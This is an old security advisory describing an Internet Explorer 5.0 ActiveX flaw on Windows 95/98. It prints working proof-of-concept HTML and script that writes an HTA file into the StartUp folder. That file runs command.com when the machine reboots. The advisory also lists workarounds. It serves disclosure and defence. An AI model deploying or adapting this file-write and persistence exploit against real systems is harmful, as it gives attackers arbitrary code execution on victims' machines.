Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or  indirect use of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95/98 (do not know about NT) allows executing arbitrary programs on the local machine by creating and overwriting local files and putting content in them.

Details:

The problem is the ActiveX Control "Object for constructing type libraries for scriptlets".
It allows creating and overwriting local files, and more putting content in them.
There is some unneeded information in the file, but part of the content may be chosen.
So, an HTML Application file may be created, feeded with an exploit information and written to the StartUp folder.
The next time the user reboots (which may be forced), the code in the HTML Application file will be executed.
This vulnerability can be exploited via email.

Workaround:
Disable Active Scripting
or
Disable Run ActiveX Controls and plug-ins

The code is:

<object id="scr"
   classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
>
</object>
<SCRIPT>
scr.Reset();
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski http://www.guninski.com');wsh.Run('c:\\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>

This page creates the file C:\windows\Start Menu\Programs\StartUp\guninski.hta
Reboot to see the changes.



| Home | Internet Explorer | Windows 2000 | AIX | Netscape | Greets | More... |